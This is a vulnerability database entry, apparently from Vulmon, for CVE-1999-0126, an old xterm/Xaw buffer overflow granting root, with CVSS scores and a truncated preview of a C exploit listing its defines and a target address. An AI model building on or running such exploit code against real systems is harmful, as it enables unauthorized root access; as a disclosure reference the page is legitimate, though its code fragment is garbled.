7.2
CVSSv2

CVE-1999-0126

Published: 03/05/1998 Updated: 09/09/2008
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

SGI IRIX buffer overflow in xterm and Xaw allows root access.

Vulnerable Product Search on Vulmon Subscribe to Product

xfree86 project xfree86

Exploits

/* * X11R63 xterm exploit for solaris 551 by DCRH 28/5/97 * */ #include <stdioh> #include <stdlibh> #include <sys/typesh> #include <unistdh> #define EXTRA2 1300 #define BUF_LENGTH 400 #define EXTRA 500 /* Need an addr such that contents of addr+0xe98 = 0 */ #define SAFE_ADDR ((unsigned)0xefff2008) #define STAC ...